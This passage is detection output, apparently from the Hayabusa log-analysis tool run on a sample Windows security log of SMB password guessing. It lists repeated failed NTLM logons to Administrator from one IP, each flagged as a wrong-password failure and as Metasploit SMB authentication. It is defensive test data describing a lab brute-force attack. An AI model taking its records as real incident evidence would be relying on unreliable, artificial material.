NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
